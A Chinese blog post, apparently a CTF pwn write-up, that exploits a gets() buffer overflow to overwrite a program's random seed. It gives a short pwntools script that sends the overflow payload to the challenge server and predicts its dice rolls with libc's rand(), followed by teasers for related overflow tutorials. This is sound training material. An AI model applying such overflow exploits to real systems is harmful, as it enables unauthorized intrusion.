pwn -----gets 漏洞的利用

最新推荐文章于 2024-07-25 08:36:21 发布
最新推荐文章于 2024-07-25 08:36:21 发布
阅读量2k 收藏 4
点赞数
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/85345053
版权

其实做pwn题是有一段时间了  但是因为复习以及学习驱动 所以没有什么时间写博客  然后这一次写一个pwn的题 

这个题 还是很简单的 

 

先用ida 看一下 发现了 我们这个题 有明显的利用漏洞 gets  然后 我们发现了  有srand 是要确定随机种子 那么 如果 我们 把这个种子 给覆盖掉  那么我们就可以 算出随机数 直接 得到flag  

在 调试下 发现了  

然后输入了 33个 1  发现种子(地址是00007FFC1A24E230)

成功被覆盖成1  那么就很好说了 

我们直接  32*a +自己想要的种子  就可以了 

写出 exp

#coding=utf-8
from pwn import*
from ctypes import*
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
#io=process('/home/pipixia/桌面/level2' )
io=remote('111.198.29.45','32393')
p='a'*0x20+p64(0)
io.sendlineafter("name:",p)
libc.srand(0)
for i in range(10):
   io.sendlineafter("number:",str(libc.rand()%6+1))

print io.recv()
print io.recv()

然后我一直不知道怎么用python来写rand 现在知道了 还要调用外部的库。。。。

pipixia233333
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
pwn学习】堆溢出(四)- off-by-one 漏洞
Morphy_Amo的博客
02-16 1091
off-by-one 漏洞 前置学习 【pwn学习】堆溢出(一) 【pwn学习】堆溢出(二)- First Fit 【pwn学习】堆溢出(三)- Unlink和UAF off-by-one是一种特殊的溢出漏洞,指只溢出一个字节的情况。 造成原因 造成off-by-one的原因常常是因为边界验证不充分。 循环写入时,循环次数设置错误导致多写入了一个字节; 字符串操作有误; strlen 是我们很熟悉的计算 ascii 字符串长度的函数,这个函数在计算字符串长度时是不把结束符 '\x00' 计算
171119 Pwn-StackSmash
whklhhhh的博客
11-24 981
1625-5 王子昂 总结《2017年11月19日》 【连续第415天总结】 A. pwn-StackSmash B.原理当程序加了Cannary来保护时,栈溢出会使得程序异常终止并输出错误信息 StackSmash就是利用这个错误信息进行任意地址读取的 报错函数为__stack_chk_fail,代码如下:void __attribute__ ((noreturn)) __stack_c
gets函数的漏洞
huangbo201102的专栏
01-16 4256
gets函数的漏洞 gets函数和fgets函数最大的不同是gets函数的缓冲区虽然由用户提供,但是用户无法指定其一次最多读入多少字节的内容。这一点导致gets变成了一个非常危险的函数。 下例演示了gets函数的危险性。该程序定义了一个缓冲区,但是使用gets函数接收用户输入的字符串时却会出现问题。 (1)在vi编辑器中编辑该程序如下: 程序清单21-5 risk.c 利用
gets 函数漏洞执行代码
草草君
11-20 694
gets 函数漏洞执行代码 最近学习了 AFL 工具,同时根据进行了gets函数的漏洞执行代码,具体的原理分析准备以后有时间进行详细分析,目前只是做一个记录,主要内容参考自这里. 环境:kali 4.13.0-kali1-amd64 1. 安装工具peda :   在命令行执行 git clone https://github.com/longld/peda.git ~/peda ech...
【二进制安全】PWN基础入门大全(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
leah126的博客
07-25 1507
PWN是一个黑客之间使用的词语,通常指攻破设备或系统。发音类似“砰”,对黑客而言,这象征着成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被操纵了。在网络安全语境中,PWN通常指的是通过不同的攻击手段如利用漏洞、进行社会工程学攻击等方法成功地获得了一个设备、系统或网络的未授权控制权。一旦攻击者“PWN了”一个系统,他们就可以执行各种恶意活动,如窃取数据、安装恶意软件或制造更广泛的破坏。
Linux栈溢出漏洞原理,盘它!PWN栈溢出漏洞
weixin_35712811的博客
05-13 469
本帖最后由 yanzm 于 2019-2-20 10:43 编辑在国内的CTF比赛中,PWN题最常见考点就是缓冲区溢出漏洞,而缓冲区溢出代表就是栈溢出漏洞。0x01 基础知识栈是一种先进后出的数据结构,从高地址向低地址增长的内存结构。函数调用栈是指程序运行时内存一段连续的区域,用来保存函数运行时的状态信息,包括函数参数与局部变量等,是系统栈的一部分。在一次函数调用中,函数调用栈中将被依次压入:函数...
PWN简单堆栈溢出漏洞利用(二)
SkYe's Blog
08-12 793
PWN简单堆栈溢出漏洞利用(二) 题目来源 下载链接(密码akcz) 题目需要读取flag文件才能正确显示出flag,也就是下文中显示的 This is flag 创建办法: 在/home/pwn/pwn1目录下创建一个名为flag文件,打开并写入This is flag 1. 运行程序、查看文件类型、保护措施 程序让我们输入一段字符串,并返回我们所输入的内容。 看到是一个 32位 动态链...
DASCTF6月赛Pwn-azez_heap wp
qq_31457355的博客
10-07 1208
本次比赛是dasctf6月赛,学到了很多东西,感谢 1.首先着重记录一下azez_heap这个题目,剩下的题目放在另一篇博客 知识点: _IO_flush_all_lockp 触发条件 反向shell的利用 分析: checksec: 保护全开,毋庸置疑 通过ida分析可以确定程序的唯一漏洞点在edit里面,可以控制下一个堆块的fd和bk add里面size可以申请到0x2333已经很大了,根据以往的做题经验可以想到要打global_max_fast,而且堆块使用calloc分配,我们知道calloc
[CTF-PWN]攻防世界新手村-hello_pwn[wp]
murongxuege的博客
10-01 2583
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 从描述中可以看出当前程序是要进行年龄的输入操作的,有输入操作,还是在新手村,那么大概率是gets()等C函数输入漏洞,进一步猜测是普通的内存地址覆盖的题。 che
CTF--PWN--作业记录之栈溢出(仅做个人课程学习作业记录,可能对各位帮助不大)
weixin_43594719的博客
10-14 326
【步骤一】使用IDA打开first文件进行静态反编译,在过程中我们可以得知分析出:ESP与RET的的地址相差24h;wuwu函数入口地址为0804849B。而只需将RET修改为wuwu函数的入口地址即可在执行完haha函数后跳转到wuwu函数。 【步骤二】本次使用虚拟机进行试验,打开虚拟机后需要重新进行对共享文件夹进行挂载。 【步骤三】进入01-first文件夹,使用命令ls -al查看我们对文件夹中文档的权限,有x就是有权限,没有x就是无权限。若我们对first无权限,可使用chmod +x firs
gets(s)存在的溢出漏洞问题
miaobeihai的博客
03-02 3195
scanf遇到输出不能有空格,所以用gets输入字符串,但是gets出现了一个潜在问题,gets将不停地往s中塞东西,不管s的可用空间是否足够,就存在溢出漏洞问题 解决方案可以用fgets代替, 不如说char s[100],buf[100]; fgets(buf,sizeof(s),stdin); while(fgets(buf,sizeof(buf),stdin)//循环输入
缓冲区溢出漏洞那些事:C -gets函数
m0_71745258的博客
02-21 582
攻击者通过覆盖应用程序的内存来利用缓冲区溢出问题。这会改变程序的执行路径,触发损坏文件或暴露私人信息的响应。例如,攻击者可能会引入额外的代码,向应用程序发送新指令以访问IT 系统。如果攻击者知道程序的内存布局,他们可以故意提供缓冲区无法存储的输入,并覆盖保存可执行代码的区域,用他们自己的代码替换它。例如,攻击者可以覆盖指针(指向内存中另一个区域的对象)并将其指向漏洞利用负载,从而获得对程序的控制权。如图片过大被平台压缩导致看不清的话,扫码下方二维码CSDN大礼包:《黑客&网络安全入门&进阶学习资源包。
buu pwn刷题——分类题型1——gets溢出无脑填充
苗_的博客
09-07 1103
gets漏洞 gets从标准输入设备读字符串函数,其可以无限读取,不会判断上限,以回车结束读取,所以应该确保buffer的空间足够大,以便在执行读操作时不发生溢出。 栈结构: (图自ctf-wiki) warmup_csaw_2016 找到gets漏洞,v5到rbp有0x40的内存 无脑填充即可:'a' * 0x40 + 'b' * 8 + p64(0x40060d) exp #!/usr/bin/python from pwn import * r = remote('no
gets()的结构性缺陷和补救措施
JokesForJoker的博客
08-17 1053
获取函数
CTF PWN入坑
Alan-WalkBill的博客
11-24 604
CTF PWN入门(二) 1.攻防世界 when_did_you_born 老规矩,uabntu下查看是几位程序,开了什么保护,然后用ida F5大法,分析 发现一个重要的gets函数,和得到flag的条件。从v5覆盖到v6 上脚本, 然后执行, 得到flag。 2.hello pwn 文件查看发现是64位,用64位ida Pro打开,F5大法得到 得到一个条件,再看看sub_40086这个函数...
PWN学习笔记(1)
Jason_ZhouYetao的博客
07-16 2838
首先来说说pwn,这个水还是很深的,不过我学习pwn的原因是我觉得pwn是最接近黑客的东西,当然web也是我考虑的一个方向,但是pwn更加偏向于对代码这方面的知识,所以我也就选择了pwn这个方向。 0x1 首先pwn的最基本的东西就是c语言,一般的pwn题目都是以c代码来出的题目,所以学好c是做pwn的前提,之后还需要一定的Linux命令的基础和各种插件的使用(比如在溢出这块还是以gdb的pe...
CTF-PWN学习-为缺少指导的同学而生
热门推荐
yuwoxinanA3的博客
05-11 1万+
入门PWN不可能无痛,但尽量会减轻大家的痛苦,怎么说呢,就像博主在你们前面一步的位置,帮你们挡着一点风浪前进。
pwn基础知识笔记
月阴荒的博客
02-20 2347
算是总的开一篇文章,把学到的知识总结一下,之后会重复写到各个文章里面 checksec指令, 用来查询pwn题目的壳和保护,并且能够看到程序的信息 1.Canary保护 参考链接:https://blog.csdn.net/weixin_44540286/article/details/101629735?utm_source=distribute.pc_relevant.none-task Ca...
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值